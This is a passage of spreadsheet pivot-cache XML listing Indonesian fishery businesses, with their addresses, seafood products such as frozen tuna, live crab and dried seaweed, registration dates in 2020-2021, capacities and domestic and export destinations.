    <s v="Japan"/>
  </r>
  <r>
    <n v="23509"/>
    <x v="871"/>
    <s v="PT. SINAR MAKMUR SEMARANG"/>
    <s v="Jl. Bawen Bukit Permai C32 RT 07 RW 01, Kel. Bawen, Kec. Bawen, Kabupaten Magelang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Sisik Ikan Terdemineralisasi Untuk Kolagen"/>
    <d v="2021-03-22T00:00:00"/>
    <n v="1379444"/>
    <m/>
    <s v="France, Italy, Japan, Spain"/>
  </r>
  <r>
    <n v="23510"/>
    <x v="857"/>
    <s v="PT, MARINECIPTA AGUNG"/>
    <s v="Desa Wonokoyo, Kel, Wonokoyo, Kec, Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Salmon Masak Beku"/>
    <d v="2021-01-22T00:00:00"/>
    <n v="29754.799999999999"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="23511"/>
    <x v="872"/>
    <s v="PT. DHARMA SAMUDERA FISHING INDUSTIRES"/>
    <s v="Jl. Yos Sudarso No. 39, Kel. Kendari Caddi, Kec. Kendari, Kota Kendari&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Ikan Pelagis Beku (Lemadang, Marlin, Gindara, Cakalang, Tenggiri, Pedang)"/>
    <d v="2021-04-30T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="Australia, Canada, China, Korea, Republic of, Russian Federation, United States, Viet Nam"/>
  </r>
  <r>
    <n v="23512"/>
    <x v="872"/>
    <s v="PT. DHARMA SAMUDERA FISHING INDUSTIRES"/>
    <s v="Jl. Yos Sudarso No. 39, Kel. Kendari Caddi, Kec. Kendari, Kota Kendari&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Tuna Beku"/>
    <d v="2021-04-30T00:00:00"/>
    <n v="25000"/>
    <m/>
    <s v="Australia, Canada, China, Korea, Republic of, Russian Federation, United States, Viet Nam"/>
  </r>
  <r>
    <n v="23513"/>
    <x v="872"/>
    <s v="PT. DHARMA SAMUDERA FISHING INDUSTIRES"/>
    <s v="Jl. Yos Sudarso No. 39, Kel. Kendari Caddi, Kec. Kendari, Kota Kendari&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Ikan Demersal Beku (Emperor, Kerapu, Hachijo, Hamadai, Kakatua, Pinjalo, Bawal, Kakap Merah, Kaci-kaci, Guntur, Barramundi)"/>
    <d v="2021-04-30T00:00:00"/>
    <n v="25000"/>
    <m/>
    <s v="Australia, Canada, China, Korea, Republic of, Russian Federation, United States, Viet Nam"/>
  </r>
  <r>
    <n v="23514"/>
    <x v="872"/>
    <s v="PT. DHARMA SAMUDERA FISHING INDUSTIRES"/>
    <s v="Jl. Yos Sudarso No. 39, Kel. Kendari Caddi, Kec. Kendari, Kota Kendari&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-04-30T00:00:00"/>
    <n v="25000"/>
    <m/>
    <s v="Australia, Canada, China, Korea, Republic of, Russian Federation, United States, Viet Nam"/>
  </r>
  <r>
    <n v="23523"/>
    <x v="873"/>
    <s v="HOME INDUSTRI MILKFISH NEW ISTICHOMAH"/>
    <s v="Jl. Dworowati Raya No.29B, Kel. Krobokan, Kec. Semarang Barat, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Bandeng Presto"/>
    <d v="2021-01-20T00:00:00"/>
    <n v="48000"/>
    <s v="Kota Jakarta Pusat"/>
    <m/>
  </r>
  <r>
    <n v="23537"/>
    <x v="874"/>
    <s v="PT. PUTRI MANALU BERSAUDARA"/>
    <s v="Jl. Sei Brantas No.81, Kel. Babura Sunggal, Kec. Medan Sunggal, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kepiting Hidup"/>
    <d v="2021-01-07T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Medan"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23538"/>
    <x v="874"/>
    <s v="PT. PUTRI MANALU BERSAUDARA"/>
    <s v="Jl. Sei Brantas No.81, Kel. Babura Sunggal, Kec. Medan Sunggal, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Siput Hidup"/>
    <d v="2021-01-07T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Medan"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23539"/>
    <x v="874"/>
    <s v="PT. PUTRI MANALU BERSAUDARA"/>
    <s v="Jl. Sei Brantas No.81, Kel. Babura Sunggal, Kec. Medan Sunggal, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kerang Hidup"/>
    <d v="2021-01-07T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Medan"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23541"/>
    <x v="874"/>
    <s v="PT. PUTRI MANALU BERSAUDARA"/>
    <s v="Jl. Sei Brantas No.81, Kel. Babura Sunggal, Kec. Medan Sunggal, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Lobster Air Tawar Hidup"/>
    <d v="2021-01-07T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Medan"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23542"/>
    <x v="874"/>
    <s v="PT. PUTRI MANALU BERSAUDARA"/>
    <s v="Jl. Sei Brantas No.81, Kel. Babura Sunggal, Kec. Medan Sunggal, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Lobster Air Tawar Beku"/>
    <d v="2021-01-07T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Medan"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23543"/>
    <x v="874"/>
    <s v="PT. PUTRI MANALU BERSAUDARA"/>
    <s v="Jl. Sei Brantas No.81, Kel. Babura Sunggal, Kec. Medan Sunggal, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Daging Kepiting Rebus Beku"/>
    <d v="2021-01-07T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Medan"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23544"/>
    <x v="874"/>
    <s v="PT. PUTRI MANALU BERSAUDARA"/>
    <s v="Jl. Sei Brantas No.81, Kel. Babura Sunggal, Kec. Medan Sunggal, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Beku"/>
    <d v="2021-01-07T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Medan"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23545"/>
    <x v="874"/>
    <s v="PT. PUTRI MANALU BERSAUDARA"/>
    <s v="Jl. Sei Brantas No.81, Kel. Babura Sunggal, Kec. Medan Sunggal, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kepiting Kulit Lunak Beku"/>
    <d v="2021-01-07T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Medan"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23546"/>
    <x v="874"/>
    <s v="PT. PUTRI MANALU BERSAUDARA"/>
    <s v="Jl. Sei Brantas No.81, Kel. Babura Sunggal, Kec. Medan Sunggal, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Segar (Kerapu, Bawal, Kakap)"/>
    <d v="2021-01-07T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Medan"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23548"/>
    <x v="874"/>
    <s v="PT. PUTRI MANALU BERSAUDARA"/>
    <s v="Jl. Sei Brantas No.81, Kel. Babura Sunggal, Kec. Medan Sunggal, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kepiting Segar"/>
    <d v="2021-01-07T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Medan"/>
    <m/>
  </r>
  <r>
    <n v="23549"/>
    <x v="874"/>
    <s v="PT. PUTRI MANALU BERSAUDARA"/>
    <s v="Jl. Sei Brantas No.81, Kel. Babura Sunggal, Kec. Medan Sunggal, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Segar"/>
    <d v="2021-01-07T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Medan"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23550"/>
    <x v="874"/>
    <s v="PT. PUTRI MANALU BERSAUDARA"/>
    <s v="Jl. Sei Brantas No.81, Kel. Babura Sunggal, Kec. Medan Sunggal, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Kering"/>
    <d v="2021-01-07T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Medan"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23551"/>
    <x v="874"/>
    <s v="PT. PUTRI MANALU BERSAUDARA"/>
    <s v="Jl. Sei Brantas No.81, Kel. Babura Sunggal, Kec. Medan Sunggal, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Asin Kering"/>
    <d v="2021-01-07T00:00:00"/>
    <n v="2000000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="23552"/>
    <x v="874"/>
    <s v="PT. PUTRI MANALU BERSAUDARA"/>
    <s v="Jl. Sei Brantas No.81, Kel. Babura Sunggal, Kec. Medan Sunggal, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Teripang Kering"/>
    <d v="2021-01-07T00:00:00"/>
    <n v="2000000"/>
    <s v="Kota Medan"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23553"/>
    <x v="875"/>
    <s v="PT. APNAL MAKMUR JAYA"/>
    <s v="Jl. Barek Motor RT 002 RW 008, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Segar (Jahan, Kerapu, Kakap, Ayam-ayam, Kaci-kaci, Ekor Kuning)"/>
    <d v="2020-12-22T00:00:00"/>
    <n v="20000"/>
    <s v="Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="23554"/>
    <x v="875"/>
    <s v="PT. APNAL MAKMUR JAYA"/>
    <s v="Jl. Barek Motor RT 002 RW 008, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Segar (Tongkol, Kembung, Talang-talang, Selar Kuning, Tenggiri)"/>
    <d v="2020-12-22T00:00:00"/>
    <n v="200000"/>
    <s v="Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="23555"/>
    <x v="876"/>
    <s v="PT. ABADI MAKMUR OCEAN"/>
    <s v="Komplek Pelabuhan Perikanan Samudera Kendari, Jl. Samudera No. 3, Kel. Puday, Kec. Abeli, Kota Kendari&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Deho, Layang, Cakalang)"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="1500000"/>
    <s v="Kota Bekasi, Kota Pasuruan"/>
    <s v="Thailand"/>
  </r>
  <r>
    <n v="23556"/>
    <x v="877"/>
    <s v="PT. SUMBER ANEKA MAKANAN"/>
    <s v="Komplek Pergudangan Sentra Industri Terpadu PIK Blok D-2 No.5, Kel. Kamal Muara, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Telur Ikan Beku"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="20"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="23557"/>
    <x v="877"/>
    <s v="PT. SUMBER ANEKA MAKANAN"/>
    <s v="Komplek Pergudangan Sentra Industri Terpadu PIK Blok D-2 No.5, Kel. Kamal Muara, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Telur Ikan Terbang Kering"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="20"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="23558"/>
    <x v="877"/>
    <s v="PT. SUMBER ANEKA MAKANAN"/>
    <s v="Komplek Pergudangan Sentra Industri Terpadu PIK Blok D-2 No.5, Kel. Kamal Muara, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Telur Ikan Segar"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="20"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="23560"/>
    <x v="878"/>
    <s v="PT. ANUGRAH MARITIM SENTOSA"/>
    <s v="Jl. Muara Baru Ujung, Jl Pari Blok L No.3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Lemuru, Deho, Kembung, Lemadang, Meka, Gindara, Muroaji)"/>
    <d v="2021-02-23T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="23561"/>
    <x v="878"/>
    <s v="PT. ANUGRAH MARITIM SENTOSA"/>
    <s v="Jl. Muara Baru Ujung, Jl Pari Blok L No.3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Kakap Putih, Bawal Hitam, Gulama, Emperor, Katamba, Lencam)"/>
    <d v="2021-02-23T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="23562"/>
    <x v="878"/>
    <s v="PT. ANUGRAH MARITIM SENTOSA"/>
    <s v="Jl. Muara Baru Ujung, Jl Pari Blok L No.3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-02-23T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="23564"/>
    <x v="878"/>
    <s v="PT. ANUGRAH MARITIM SENTOSA"/>
    <s v="Jl. Muara Baru Ujung, Jl Pari Blok L No.3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2021-02-23T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="23565"/>
    <x v="878"/>
    <s v="PT. ANUGRAH MARITIM SENTOSA"/>
    <s v="Jl. Muara Baru Ujung, Jl Pari Blok L No.3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Bandeng Beku"/>
    <d v="2021-02-23T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="23566"/>
    <x v="879"/>
    <s v="CV. MINA SEJAHTERA"/>
    <s v="Sabang Mawang, Kel. Sabang Mawang, Kec. Pulau Tiga, Kabupaten Natuna&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Beku (Pisang-Pisang, Jahan, Kerapu, Jebung, Ungar, Kakap, Kaci-Kaci, Ekor Kuning, Pari)"/>
    <d v="2021-01-11T00:00:00"/>
    <n v="275000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="23567"/>
    <x v="879"/>
    <s v="CV. MINA SEJAHTERA"/>
    <s v="Sabang Mawang, Kel. Sabang Mawang, Kec. Pulau Tiga, Kabupaten Natuna&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Beku (Barakuda, Mata Besar, Tongkol, Bawal, Selar, Layang, Tamban, Tenggiri)"/>
    <d v="2021-01-11T00:00:00"/>
    <n v="275000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="23568"/>
    <x v="879"/>
    <s v="CV. MINA SEJAHTERA"/>
    <s v="Sabang Mawang, Kel. Sabang Mawang, Kec. Pulau Tiga, Kabupaten Natuna&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-01-11T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="23572"/>
    <x v="880"/>
    <s v="CV. LAUTAN BERKAT FOOD"/>
    <s v="Jl. Industri Bajomulya Ujung, Kel. Growong Lor, Kec. Juwana, Kabupaten Pati&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Pelagis Beku (Sarden, Salem, Layang, Kerapu, Kembung, Tongkol)"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="23574"/>
    <x v="750"/>
    <s v="CABANG LAMPUNG BUMI MENARA INTERNUSA, PT."/>
    <s v="Jl. Ir. Sutami KM 12, Kel. Lematang, Kec. Tanjung Bintang, Kabupaten Lampung Selatan&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Salmon Beku"/>
    <d v="2021-02-01T00:00:00"/>
    <n v="1008000"/>
    <m/>
    <s v="Canada, United States"/>
  </r>
  <r>
    <n v="23575"/>
    <x v="691"/>
    <s v="PT. SAMUDRA MANDIRI SENTOSA"/>
    <s v="Jl. Wolter Mongisidi Km 5, Kel. Wangurer, Kec. Madidir, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Pelagis Segar (Bonito, Makerel, Marlin, Cakalang, Pedang)"/>
    <d v="2021-05-31T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="Australia, China, France, Germany, Hong Kong, Japan, Korea, Democratic People's Republic of, Netherlands, Singapore, Spain, Switzerland, Taiwan, Province of China, Thailand, United Kingdom, United States"/>
  </r>
  <r>
    <n v="23576"/>
    <x v="881"/>
    <s v="KOPERASI ACEH FOOD FISH JELLY"/>
    <s v="Jl. Rama Setia No.49, Kel. Lampaseh Aceh, Kec. Meuraxa, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Naget Ikan, Otak-otak Ikan, Kaki Naga, Bakso Tahu Ikan, Dimsum Ikan, Dimsum Udang, Ekado) "/>
    <d v="2020-12-28T00:00:00"/>
    <n v="120"/>
    <s v="Kabupaten Aceh Barat, Kabupaten Aceh Besar, Kabupaten Aceh Barat Daya, Kota Banda Aceh, Kota Langsa"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="23577"/>
    <x v="882"/>
    <s v="PT. EXCLUSIVE PANCA ANUGRAH"/>
    <s v="Jl. Jendral Ahmad Yani Km 14 RT 08 RW 03, Kel. Sepancar Lawang Kulon, Kec. Baturaja Timur, Kabupaten Ogan Komering Ulu&lt;br&gt;Sumatera Selatan"/>
    <n v="9"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Salem, Layang)"/>
    <d v="2020-12-28T00:00:00"/>
    <n v="317391"/>
    <s v="Kabupaten Ogan Komering Ulu, Kabupaten Muara Enim, Kabupaten Ogan Komering Ulu Selatan, Kabupaten Ogan Komering Ulu Timur, Kota Palembang, Kota Pagar Alam"/>
    <m/>
  </r>
  <r>
    <n v="23578"/>
    <x v="883"/>
    <s v="CV. PASIFIC HARVEST"/>
    <s v="Jl. Tratas No.61, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Kaleng"/>
    <d v="2021-01-15T00:00:00"/>
    <n v="6240000"/>
    <m/>
    <s v="Angola, Bahrain, United Arab Emirates"/>
  </r>
  <r>
    <n v="23579"/>
    <x v="883"/>
    <s v="CV. PASIFIC HARVEST"/>
    <s v="Jl. Tratas No.61, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Loin Masak Beku"/>
    <d v="2021-01-15T00:00:00"/>
    <n v="6240000"/>
    <m/>
    <s v="United Arab Emirates"/>
  </r>
  <r>
    <n v="23580"/>
    <x v="883"/>
    <s v="CV. PASIFIC HARVEST"/>
    <s v="Jl. Tratas No.61, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Pouch"/>
    <d v="2021-01-15T00:00:00"/>
    <n v="6240000"/>
    <m/>
    <s v="Angola, Bahrain, United Arab Emirates"/>
  </r>
  <r>
    <n v="23582"/>
    <x v="884"/>
    <s v="PT. SARI NUSA SEJATI"/>
    <s v="Banjar Dinas Mawar, Kel. Tukad Sumaga, Kec. Gerokgak, Kabupaten Buleleng&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Segar"/>
    <d v="2021-01-25T00:00:00"/>
    <n v="70000"/>
    <m/>
    <s v="Australia, China, Hong Kong, Taiwan, Province of China, United States"/>
  </r>
  <r>
    <n v="23583"/>
    <x v="471"/>
    <s v="UD. SAMUDERA JAYA"/>
    <s v="Jl. Terboyo Industri Barat Blok E No.4, Kel. Trimulyo, Kec. Genuk, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Lobster Beku"/>
    <d v="2021-03-31T00:00:00"/>
    <n v="600000"/>
    <s v="Kota Jakarta Utara, Kota Semarang, Kota Denpasar"/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="23584"/>
    <x v="884"/>
    <s v="PT. SARI NUSA SEJATI"/>
    <s v="Banjar Dinas Mawar, Kel. Tukad Sumaga, Kec. Gerokgak, Kabupaten Buleleng&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Segar (Lemadang, Marlin, Meka, Tenggiri)"/>
    <d v="2021-01-25T00:00:00"/>
    <n v="45000"/>
    <m/>
    <s v="Australia, China, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="23585"/>
    <x v="884"/>
    <s v="PT. SARI NUSA SEJATI"/>
    <s v="Banjar Dinas Mawar, Kel. Tukad Sumaga, Kec. Gerokgak, Kabupaten Buleleng&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Demersal Segar (Kakap Putih, Emperor, Kerapu, Layur, Kakatua, Bawal, Kakap)"/>
    <d v="2021-01-25T00:00:00"/>
    <n v="120000"/>
    <m/>
    <s v="Australia, China, Hong Kong, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="23586"/>
    <x v="885"/>
    <s v="PT. INDOGUNA UTAMA"/>
    <s v="Jl. Taruna No.8 RT 002 RW 004 (Room G5 &amp; G7), Kel. Pondok Bambu, Kec. Duren Sawit, Kota Jakarta Timur&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Beku"/>
    <d v="2021-01-11T00:00:00"/>
    <n v="25000"/>
    <s v="Kota Bekasi, Kota Yogyakarta, Kota Surabaya, Kota Denpasar, Kota Balikpapan, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="23587"/>
    <x v="885"/>
    <s v="PT. INDOGUNA UTAMA"/>
    <s v="Jl. Taruna No.8 RT 002 RW 004 (Room G5 &amp; G7), Kel. Pondok Bambu, Kec. Duren Sawit, Kota Jakarta Timur&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Segar"/>
    <d v="2021-01-11T00:00:00"/>
    <n v="25000"/>
    <s v="Kota Palembang, Kota Jakarta Selatan, Kota Jakarta Pusat, Kota Bekasi, Kota Yogyakarta, Kota Surabaya, Kota Denpasar, Kota Balikpapan, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="23588"/>
    <x v="885"/>
    <s v="PT. INDOGUNA UTAMA"/>
    <s v="Jl. Taruna No.8 RT 002 RW 004 (Room G5 &amp; G7), Kel. Pondok Bambu, Kec. Duren Sawit, Kota Jakarta Timur&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2021-01-11T00:00:00"/>
    <n v="6000"/>
    <s v="Kota Palembang, Kota Jakarta Selatan, Kota Jakarta Pusat, Kota Bekasi, Kota Surabaya, Kota Denpasar, Kota Balikpapan, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="23589"/>
    <x v="885"/>
    <s v="PT. INDOGUNA UTAMA"/>
    <s v="Jl. Taruna No.8 RT 002 RW 004 (Room G5 &amp; G7), Kel. Pondok Bambu, Kec. Duren Sawit, Kota Jakarta Timur&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Lobster Beku"/>
    <d v="2021-01-11T00:00:00"/>
    <n v="6000"/>
    <s v="Kota Palembang, Kota Jakarta Selatan, Kota Jakarta Pusat, Kota Bekasi, Kota Yogyakarta, Kota Surabaya, Kota Denpasar, Kota Balikpapan, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="23601"/>
    <x v="886"/>
    <s v="PT. AGARINDO SAKTI"/>
    <s v="Jl. Haji Syamsuddin Dg Ngerang, Kel. Kalaserena, Kec. Bontonompo, Kabupaten Gowa&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-02-02T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="23602"/>
    <x v="826"/>
    <s v="UD. BUNDA FOODS"/>
    <s v="RT 01 RW 01, Kel. Penatarsewu, Kec. Tanggulangin, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Terasi Udang"/>
    <d v="2020-12-29T00:00:00"/>
    <n v="1200"/>
    <s v="Kabupaten Sidoarjo, Kota Surabaya, Kabupaten Jembrana"/>
    <m/>
  </r>
  <r>
    <n v="23603"/>
    <x v="887"/>
    <s v="KOSPERMINDO"/>
    <s v="Jl, Kima 8 Kav, 3AI, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-02-23T00:00:00"/>
    <n v="550000"/>
    <s v="Kota Jakarta Barat"/>
    <s v="Philippines"/>
  </r>
  <r>
    <n v="23604"/>
    <x v="888"/>
    <s v="PT. PRIMA BAHARI INTI LESTARI"/>
    <s v="Jl. Kima 12 KAV-5C Makassar, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Segar (Katamba, Kerapu, Kaneke, Seabream, Kakap)"/>
    <d v="2021-01-29T00:00:00"/>
    <n v="8000"/>
    <m/>
    <s v="Australia, United States"/>
  </r>
  <r>
    <n v="23605"/>
    <x v="888"/>
    <s v="PT, PRIMA BAHARI INTI LESTARI"/>
    <s v="Jl, Kima 12 KAV-5C Makassar, Kel, Daya, Kec, Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Beku (Katamba, Kerapu, Kaneke, Seabream, Kakap)"/>
    <d v="2021-01-29T00:00:00"/>
    <n v="152101.68"/>
    <m/>
    <s v="Australia, United States"/>
  </r>
  <r>
    <n v="23606"/>
    <x v="888"/>
    <s v="PT. PRIMA BAHARI INTI LESTARI"/>
    <s v="Jl. Kima 12 KAV-5C Makassar, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Cephalopoda Segar (Gurita)"/>
    <d v="2021-01-29T00:00:00"/>
